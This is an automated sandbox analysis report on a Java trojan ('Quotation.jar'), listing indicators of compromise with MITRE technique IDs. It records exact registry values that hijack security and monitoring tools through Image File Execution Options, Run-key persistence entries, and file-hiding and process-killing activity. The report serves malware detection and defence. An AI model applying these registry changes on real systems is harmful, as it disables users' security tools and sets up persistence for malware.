1cb6a24bc3f30996150c4c737cf2bc33e5a04741a93e516d6504dd8602f5f843

Analysis

max time kernel
139s
max time network
138s
platform
windows10_x64
resource
win10
submitted
07-07-2020 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quotation.jar
Size

402KB
MD5

fd50183db6b1d898c6c03fb37addd1d4
SHA1

39dcdc068ae5b59a92cd2c9fe9ded56e45a8c77c
SHA256

1cb6a24bc3f30996150c4c737cf2bc33e5a04741a93e516d6504dd8602f5f843
SHA512

c0c5a8091fdca57e0097503d15d08872f022d91dc7fc343d56d2071e5519f32803b723d6f7da88b70364da5d6abd2157d9024e3a380ab83f22bfc5ac27634fa2

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Kills process with taskkill 16 IoCs

evasion

pid	Process
1812	taskkill.exe
580	taskkill.exe
4988	taskkill.exe
424	taskkill.exe
4652	taskkill.exe
4332	taskkill.exe
688	taskkill.exe
4560	taskkill.exe
2060	taskkill.exe
4956	taskkill.exe
4556	taskkill.exe
4940	taskkill.exe
3192	taskkill.exe
4920	taskkill.exe
4288	taskkill.exe
4804	taskkill.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\RaAKs	java.exe
File opened for modification	C:\Windows\System32\RaAKs	java.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3588	java.exe

Suspicious use of AdjustPrivilegeToken 164 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3056	WMIC.exe
Token: SeSecurityPrivilege	3056	WMIC.exe
Token: SeTakeOwnershipPrivilege	3056	WMIC.exe
Token: SeLoadDriverPrivilege	3056	WMIC.exe
Token: SeSystemProfilePrivilege	3056	WMIC.exe
Token: SeSystemtimePrivilege	3056	WMIC.exe
Token: SeProfSingleProcessPrivilege	3056	WMIC.exe
Token: SeIncBasePriorityPrivilege	3056	WMIC.exe
Token: SeCreatePagefilePrivilege	3056	WMIC.exe
Token: SeBackupPrivilege	3056	WMIC.exe
Token: SeRestorePrivilege	3056	WMIC.exe
Token: SeShutdownPrivilege	3056	WMIC.exe
Token: SeDebugPrivilege	3056	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3056	WMIC.exe
Token: SeRemoteShutdownPrivilege	3056	WMIC.exe
Token: SeUndockPrivilege	3056	WMIC.exe
Token: SeManageVolumePrivilege	3056	WMIC.exe
Token: 33	3056	WMIC.exe
Token: 34	3056	WMIC.exe
Token: 35	3056	WMIC.exe
Token: 36	3056	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3056	WMIC.exe
Token: SeSecurityPrivilege	3056	WMIC.exe
Token: SeTakeOwnershipPrivilege	3056	WMIC.exe
Token: SeLoadDriverPrivilege	3056	WMIC.exe
Token: SeSystemProfilePrivilege	3056	WMIC.exe
Token: SeSystemtimePrivilege	3056	WMIC.exe
Token: SeProfSingleProcessPrivilege	3056	WMIC.exe
Token: SeIncBasePriorityPrivilege	3056	WMIC.exe
Token: SeCreatePagefilePrivilege	3056	WMIC.exe
Token: SeBackupPrivilege	3056	WMIC.exe
Token: SeRestorePrivilege	3056	WMIC.exe
Token: SeShutdownPrivilege	3056	WMIC.exe
Token: SeDebugPrivilege	3056	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3056	WMIC.exe
Token: SeRemoteShutdownPrivilege	3056	WMIC.exe
Token: SeUndockPrivilege	3056	WMIC.exe
Token: SeManageVolumePrivilege	3056	WMIC.exe
Token: 33	3056	WMIC.exe
Token: 34	3056	WMIC.exe
Token: 35	3056	WMIC.exe
Token: 36	3056	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2060	WMIC.exe
Token: SeSecurityPrivilege	2060	WMIC.exe
Token: SeTakeOwnershipPrivilege	2060	WMIC.exe
Token: SeLoadDriverPrivilege	2060	WMIC.exe
Token: SeSystemProfilePrivilege	2060	WMIC.exe
Token: SeSystemtimePrivilege	2060	WMIC.exe
Token: SeProfSingleProcessPrivilege	2060	WMIC.exe
Token: SeIncBasePriorityPrivilege	2060	WMIC.exe
Token: SeCreatePagefilePrivilege	2060	WMIC.exe
Token: SeBackupPrivilege	2060	WMIC.exe
Token: SeRestorePrivilege	2060	WMIC.exe
Token: SeShutdownPrivilege	2060	WMIC.exe
Token: SeDebugPrivilege	2060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2060	WMIC.exe
Token: SeRemoteShutdownPrivilege	2060	WMIC.exe
Token: SeUndockPrivilege	2060	WMIC.exe
Token: SeManageVolumePrivilege	2060	WMIC.exe
Token: 33	2060	WMIC.exe
Token: 34	2060	WMIC.exe
Token: 35	2060	WMIC.exe
Token: 36	2060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2060	WMIC.exe
Token: SeSecurityPrivilege	2060	WMIC.exe
Token: SeTakeOwnershipPrivilege	2060	WMIC.exe
Token: SeLoadDriverPrivilege	2060	WMIC.exe
Token: SeSystemProfilePrivilege	2060	WMIC.exe
Token: SeSystemtimePrivilege	2060	WMIC.exe
Token: SeProfSingleProcessPrivilege	2060	WMIC.exe
Token: SeIncBasePriorityPrivilege	2060	WMIC.exe
Token: SeCreatePagefilePrivilege	2060	WMIC.exe
Token: SeBackupPrivilege	2060	WMIC.exe
Token: SeRestorePrivilege	2060	WMIC.exe
Token: SeShutdownPrivilege	2060	WMIC.exe
Token: SeDebugPrivilege	2060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2060	WMIC.exe
Token: SeRemoteShutdownPrivilege	2060	WMIC.exe
Token: SeUndockPrivilege	2060	WMIC.exe
Token: SeManageVolumePrivilege	2060	WMIC.exe
Token: 33	2060	WMIC.exe
Token: 34	2060	WMIC.exe
Token: 35	2060	WMIC.exe
Token: 36	2060	WMIC.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe
Token: 35	2408	WMIC.exe
Token: 36	2408	WMIC.exe
Token: SeDebugPrivilege	424	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe
Token: 35	2408	WMIC.exe
Token: 36	2408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3404	powershell.exe
Token: SeSecurityPrivilege	3404	powershell.exe
Token: SeTakeOwnershipPrivilege	3404	powershell.exe
Token: SeLoadDriverPrivilege	3404	powershell.exe
Token: SeSystemProfilePrivilege	3404	powershell.exe
Token: SeSystemtimePrivilege	3404	powershell.exe
Token: SeProfSingleProcessPrivilege	3404	powershell.exe
Token: SeIncBasePriorityPrivilege	3404	powershell.exe
Token: SeCreatePagefilePrivilege	3404	powershell.exe
Token: SeBackupPrivilege	3404	powershell.exe
Token: SeRestorePrivilege	3404	powershell.exe
Token: SeShutdownPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeSystemEnvironmentPrivilege	3404	powershell.exe
Token: SeRemoteShutdownPrivilege	3404	powershell.exe
Token: SeUndockPrivilege	3404	powershell.exe
Token: SeManageVolumePrivilege	3404	powershell.exe
Token: 33	3404	powershell.exe
Token: 34	3404	powershell.exe
Token: 35	3404	powershell.exe
Token: 36	3404	powershell.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	580	taskkill.exe
Token: SeDebugPrivilege	4920	taskkill.exe
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeDebugPrivilege	4288	taskkill.exe
Token: SeDebugPrivilege	4556	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	4940	taskkill.exe
Token: SeDebugPrivilege	4988	taskkill.exe
Token: SeDebugPrivilege	4332	taskkill.exe
Token: SeDebugPrivilege	4560	taskkill.exe
Token: SeDebugPrivilege	4804	taskkill.exe
Token: SeDebugPrivilege	688	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3404	powershell.exe
3404	powershell.exe
3404	powershell.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe

Checks for installed software on the system 1 TTPs 38 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
808	attrib.exe
904	attrib.exe
396	attrib.exe
1152	attrib.exe
1396	attrib.exe
1488	attrib.exe
576	attrib.exe
3708	attrib.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\vLuXErv = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\osDbp\\VNDAi.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\vLuXErv = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\osDbp\\VNDAi.class\""	java.exe

Suspicious use of WriteProcessMemory 386 IoCs

description	pid	Process	procid_target
PID 3588 wrote to memory of 2992	3588	java.exe	68
PID 3588 wrote to memory of 2992	3588	java.exe	68
PID 3588 wrote to memory of 408	3588	java.exe	70
PID 3588 wrote to memory of 408	3588	java.exe	70
PID 408 wrote to memory of 3056	408	cmd.exe	72
PID 408 wrote to memory of 3056	408	cmd.exe	72
PID 3588 wrote to memory of 2644	3588	java.exe	73
PID 3588 wrote to memory of 2644	3588	java.exe	73
PID 2644 wrote to memory of 2060	2644	cmd.exe	75
PID 2644 wrote to memory of 2060	2644	cmd.exe	75
PID 3588 wrote to memory of 576	3588	java.exe	76
PID 3588 wrote to memory of 576	3588	java.exe	76
PID 3588 wrote to memory of 3708	3588	java.exe	78
PID 3588 wrote to memory of 3708	3588	java.exe	78
PID 3588 wrote to memory of 808	3588	java.exe	80
PID 3588 wrote to memory of 808	3588	java.exe	80
PID 3588 wrote to memory of 904	3588	java.exe	81
PID 3588 wrote to memory of 904	3588	java.exe	81
PID 3588 wrote to memory of 396	3588	java.exe	83
PID 3588 wrote to memory of 396	3588	java.exe	83
PID 3588 wrote to memory of 1152	3588	java.exe	85
PID 3588 wrote to memory of 1152	3588	java.exe	85
PID 3588 wrote to memory of 1396	3588	java.exe	88
PID 3588 wrote to memory of 1396	3588	java.exe	88
PID 3588 wrote to memory of 1488	3588	java.exe	89
PID 3588 wrote to memory of 1488	3588	java.exe	89
PID 3588 wrote to memory of 2184	3588	java.exe	92
PID 3588 wrote to memory of 2184	3588	java.exe	92
PID 2184 wrote to memory of 2988	2184	cmd.exe	94
PID 2184 wrote to memory of 2988	2184	cmd.exe	94
PID 3588 wrote to memory of 3972	3588	java.exe	95
PID 3588 wrote to memory of 3972	3588	java.exe	95
PID 3588 wrote to memory of 3192	3588	java.exe	96
PID 3588 wrote to memory of 3192	3588	java.exe	96
PID 3588 wrote to memory of 3412	3588	java.exe	97
PID 3588 wrote to memory of 3412	3588	java.exe	97
PID 3588 wrote to memory of 3404	3588	java.exe	98
PID 3588 wrote to memory of 3404	3588	java.exe	98
PID 3588 wrote to memory of 3424	3588	java.exe	102
PID 3588 wrote to memory of 3424	3588	java.exe	102
PID 3588 wrote to memory of 3636	3588	java.exe	103
PID 3588 wrote to memory of 3636	3588	java.exe	103
PID 3588 wrote to memory of 3096	3588	java.exe	107
PID 3588 wrote to memory of 3096	3588	java.exe	107
PID 3588 wrote to memory of 2084	3588	java.exe	108
PID 3588 wrote to memory of 2084	3588	java.exe	108
PID 3588 wrote to memory of 3864	3588	java.exe	111
PID 3588 wrote to memory of 3864	3588	java.exe	111
PID 3588 wrote to memory of 3720	3588	java.exe	112
PID 3588 wrote to memory of 3720	3588	java.exe	112
PID 2184 wrote to memory of 1760	2184	cmd.exe	115
PID 2184 wrote to memory of 1760	2184	cmd.exe	115
PID 3588 wrote to memory of 1060	3588	java.exe	116
PID 3588 wrote to memory of 1060	3588	java.exe	116
PID 3588 wrote to memory of 3596	3588	java.exe	118
PID 3588 wrote to memory of 3596	3588	java.exe	118
PID 3588 wrote to memory of 1788	3588	java.exe	120
PID 3588 wrote to memory of 1788	3588	java.exe	120
PID 3588 wrote to memory of 2408	3588	java.exe	122
PID 3588 wrote to memory of 2408	3588	java.exe	122
PID 3588 wrote to memory of 3528	3588	java.exe	124
PID 3588 wrote to memory of 3528	3588	java.exe	124
PID 3588 wrote to memory of 4084	3588	java.exe	125
PID 3588 wrote to memory of 4084	3588	java.exe	125
PID 3588 wrote to memory of 1020	3588	java.exe	129
PID 3588 wrote to memory of 1020	3588	java.exe	129
PID 3588 wrote to memory of 3972	3588	java.exe	131
PID 3588 wrote to memory of 3972	3588	java.exe	131
PID 3588 wrote to memory of 804	3588	java.exe	133
PID 3588 wrote to memory of 804	3588	java.exe	133
PID 3588 wrote to memory of 3264	3588	java.exe	134
PID 3588 wrote to memory of 3264	3588	java.exe	134
PID 3588 wrote to memory of 3864	3588	java.exe	137
PID 3588 wrote to memory of 3864	3588	java.exe	137
PID 3588 wrote to memory of 424	3588	java.exe	139
PID 3588 wrote to memory of 424	3588	java.exe	139
PID 4084 wrote to memory of 2172	4084	cmd.exe	140
PID 4084 wrote to memory of 2172	4084	cmd.exe	140
PID 3588 wrote to memory of 1468	3588	java.exe	141
PID 3588 wrote to memory of 1468	3588	java.exe	141
PID 3588 wrote to memory of 2068	3588	java.exe	144
PID 3588 wrote to memory of 2068	3588	java.exe	144
PID 3588 wrote to memory of 1008	3588	java.exe	146
PID 3588 wrote to memory of 1008	3588	java.exe	146
PID 804 wrote to memory of 2408	804	cmd.exe	148
PID 804 wrote to memory of 2408	804	cmd.exe	148
PID 4084 wrote to memory of 1576	4084	cmd.exe	149
PID 4084 wrote to memory of 1576	4084	cmd.exe	149
PID 3588 wrote to memory of 980	3588	java.exe	150
PID 3588 wrote to memory of 980	3588	java.exe	150
PID 980 wrote to memory of 960	980	cmd.exe	152
PID 980 wrote to memory of 960	980	cmd.exe	152
PID 980 wrote to memory of 1212	980	cmd.exe	153
PID 980 wrote to memory of 1212	980	cmd.exe	153
PID 3588 wrote to memory of 1644	3588	java.exe	154
PID 3588 wrote to memory of 1644	3588	java.exe	154
PID 1644 wrote to memory of 1800	1644	cmd.exe	156
PID 1644 wrote to memory of 1800	1644	cmd.exe	156
PID 1644 wrote to memory of 1916	1644	cmd.exe	157
PID 1644 wrote to memory of 1916	1644	cmd.exe	157
PID 3588 wrote to memory of 576	3588	java.exe	158
PID 3588 wrote to memory of 576	3588	java.exe	158
PID 576 wrote to memory of 3420	576	cmd.exe	160
PID 576 wrote to memory of 3420	576	cmd.exe	160
PID 576 wrote to memory of 2988	576	cmd.exe	161
PID 576 wrote to memory of 2988	576	cmd.exe	161
PID 3588 wrote to memory of 3632	3588	java.exe	162
PID 3588 wrote to memory of 3632	3588	java.exe	162
PID 3588 wrote to memory of 2060	3588	java.exe	163
PID 3588 wrote to memory of 2060	3588	java.exe	163
PID 3632 wrote to memory of 4036	3632	cmd.exe	166
PID 3632 wrote to memory of 4036	3632	cmd.exe	166
PID 3632 wrote to memory of 1152	3632	cmd.exe	167
PID 3632 wrote to memory of 1152	3632	cmd.exe	167
PID 3588 wrote to memory of 2964	3588	java.exe	168
PID 3588 wrote to memory of 2964	3588	java.exe	168
PID 2964 wrote to memory of 3096	2964	cmd.exe	171
PID 2964 wrote to memory of 3096	2964	cmd.exe	171
PID 2964 wrote to memory of 1164	2964	cmd.exe	172
PID 2964 wrote to memory of 1164	2964	cmd.exe	172
PID 3588 wrote to memory of 2100	3588	java.exe	173
PID 3588 wrote to memory of 2100	3588	java.exe	173
PID 2100 wrote to memory of 1916	2100	cmd.exe	175
PID 2100 wrote to memory of 1916	2100	cmd.exe	175
PID 2100 wrote to memory of 508	2100	cmd.exe	176
PID 2100 wrote to memory of 508	2100	cmd.exe	176
PID 3588 wrote to memory of 3696	3588	java.exe	177
PID 3588 wrote to memory of 3696	3588	java.exe	177
PID 3696 wrote to memory of 3192	3696	cmd.exe	179
PID 3696 wrote to memory of 3192	3696	cmd.exe	179
